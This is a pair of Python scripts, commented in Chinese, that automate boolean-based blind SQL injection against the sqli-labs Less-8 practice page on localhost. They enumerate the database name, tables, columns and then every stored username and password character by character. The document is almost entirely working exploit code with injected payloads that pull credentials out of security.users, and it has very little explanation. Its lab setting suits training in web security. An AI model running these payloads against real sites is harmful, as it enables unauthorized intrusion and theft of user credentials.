import requests
def decide():
for i in range(10):
response = requests.request('get',f"http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if(substr(length(length(database())), 1, 1)={i}, 1, 0)--+")
if 'You are in...........' in response.text:
return i
def ruler(size):
result = ''
for i in range(1, size + 1):
for j in range(10):
response = requests.request('get',f"http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if(substr(length(database()), {i}, 1)={j}, 1, 0)--+")
if 'You are in...........' in response.text:
result += str(j)
break
return int(result)
size = decide()
length = ruler(size)
#print(size)
#print(decide())
print(length)
得到数据库长度以及数据库的名称
速度比较慢
import requests
import string
url = 'http://127.0.0.1/sqli-labs-master/Less-8/'
i = 0
db_name_len = 0
print('[+]正在猜解数据库长度......')
while True:
payload = url + "?id=1'and length(database())=%d--+" % i
res = requests.get(payload)
# print(payload)
if 'You are in...........' in res.text:
db_name_len = i
print('数据库长度为:' + str(db_name_len))
break
if i == 30:
print('error!')
break
i += 1
print("[+]正在猜解数据库名字......")
db_name = ''
for i in range(1, db_name_len + 1):
# print(i)
for k in string.ascii_lowercase:
# print(k)
payload = url + "?id=1'and substr(database(),%d,1)='%s'--+" % (i, k)
res = requests.get(payload)
# print(payload)
if 'You are in...........' in res.text:
db_name += k
# print(db_name)
break
print("数据库为: %s" % db_name)
# 猜解几张表
print("[+]正在猜解表的数量......")
tab_num = 0
while True:
payload = url + "?id=1'and (select count(table_name) from information_schema.tables where table_schema='security')=%d--+" % tab_num
res = requests.get(payload)
if 'You are in...........' in res.text:
print("%s数据库共有" % db_name + str(tab_num) + "张表")
break
else:
tab_num += 1
print("[+]开始猜解表名......")
for i in range(1, tab_num + 1):
tab_len = 0
while True:
payload = url + "?id=1'and (select length(table_name) from information_schema.tables where table_schema='security' limit %d,1)=%d--+" % (
i - 1, tab_len)
res = requests.get(payload)
# print(payload)
if 'You are in...........' in res.text:
# print ('第%d张表长度为:'%i+str(tab_len))
break
if tab_len == 30:
print('error!')
break
tab_len += 1
tab_name = ''
for j in range(1, tab_len + 1):
for m in string.ascii_lowercase:
payload = url + "?id=1'and substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1)='%s'--+" % (
i - 1, j, m)
res = requests.get(payload)
if 'You are in...........' in res.text:
tab_name += m
# print (tab_name)
print("[-]第%d张表名为: %s" % (i, tab_name))
# 尝试猜解表下字段......
dump_num = 0
while True:
payload = url + "?id=1'and (select count(column_name) from information_schema.columns where table_name='%s')=%d--+" % (
tab_name, dump_num)
res = requests.get(payload)
if 'You are in...........' in res.text:
print("%s表下有%d个字段" % (tab_name, dump_num))
break
dump_num += 1
for a in range(1, dump_num + 1):
dump_len = 0
while True:
payload = url + "?id=1'and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d--+" % (
tab_name, a - 1, dump_len)
res = requests.get(payload)
# print(payload)
if 'You are in...........' in res.text:
# print("第%d个字段长度为%d"%(a,dump_len))
break
dump_len += 1
if dump_len == 30:
print("error!!")
break
dump_name = ''
for i in range(1, dump_len + 1):
for j in (string.ascii_lowercase + '_-'):
payload = url + "?id=1'and substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1)='%s'--+" % (
tab_name, a - 1, i, j)
res = requests.get(payload)
if 'You are in...........' in res.text:
dump_name += j
# print(dump_name)
break
print(dump_name)
print("[+]开始猜解users表下的username......")
usn_num = 0
char = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-"
while True:
payload = url + "?id=1'and (select count(username) from security.users)=%d--+" % usn_num
res = requests.get(payload)
if "You are in" in res.text:
# print(usn_num)#13
break
usn_num += 1
for i in range(1, usn_num + 1):
usn_len = 0
while True:
payload = url + "?id=1'and (select length(username) from security.users limit %d,1)=%d--+" % (i - 1, usn_len)
res = requests.get(payload)
if "You are in" in res.text:
# print("第%d的长度为%d"%(i,usn_len))
break
usn_len += 1
usr_name = ''
for k in range(1, usn_len + 1):
for m in char:
payload = url + "?id=1'and substr((select username from security.users limit %d,1),%d,1)='%s'--+" % (
i - 1, k, m)
res = requests.get(payload)
if "You are in" in res.text:
usr_name += m
break
print(usr_name)
print("[+]开始猜解users表下的password......")
usn_num = 0
char = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-@!"
while True:
payload = url + "?id=1'and (select count(password) from security.users)=%d--+" % usn_num
res = requests.get(payload)
if "You are in" in res.text:
# print(usn_num)#13
break
usn_num += 1
for i in range(1, usn_num + 1):
usn_len = 0
while True:
payload = url + "?id=1'and (select length(password) from security.users limit %d,1)=%d--+" % (i - 1, usn_len)
res = requests.get(payload)
if "You are in" in res.text:
# print("第%d的长度为%d"%(i,usn_len))
break
usn_len += 1
usr_name = ''
for k in range(1, usn_len + 1):
for m in char:
payload = url + "?id=1'and substr((select password from security.users limit %d,1),%d,1)='%s'--+" % (
i - 1, k, m)
res = requests.get(payload)
if "You are in" in res.text:
usr_name += m
break
print(usr_name)